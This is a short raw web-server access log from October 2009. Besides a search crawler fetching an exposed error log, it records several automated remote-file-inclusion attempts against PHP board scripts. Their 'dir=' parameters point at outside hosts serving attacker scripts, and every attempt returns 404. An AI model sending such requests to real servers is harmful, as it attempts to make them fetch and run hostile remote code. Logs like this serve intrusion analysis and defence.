74.6.22.152 - - [06/Oct/2009:00:30:41 -0400] "GET /logs/error_log.Q109082600 HTTP/1.0" 200 2521164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.139.66.104 - - [06/Oct/2009:00:31:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 230 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
87.139.66.104 - - [06/Oct/2009:00:31:07 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
74.6.22.152 - - [06/Oct/2009:00:30:50 -0400] "GET /logs/error_log.Q109082600 HTTP/1.0" 200 2521164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.55.227.178 - - [06/Oct/2009:00:31:25 -0400] "GET /logs/access_log.Q109051600//skin/zero_vote/error.php?dir=http://124.138.58.254/~zpissh/bbs////skin/ggambo7002_board/scripts/ad.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
121.254.195.7 - - [06/Oct/2009:00:32:31 -0400] "GET /logs/access_log.Q109092200/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
121.254.195.7 - - [06/Oct/2009:00:32:31 -0400] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
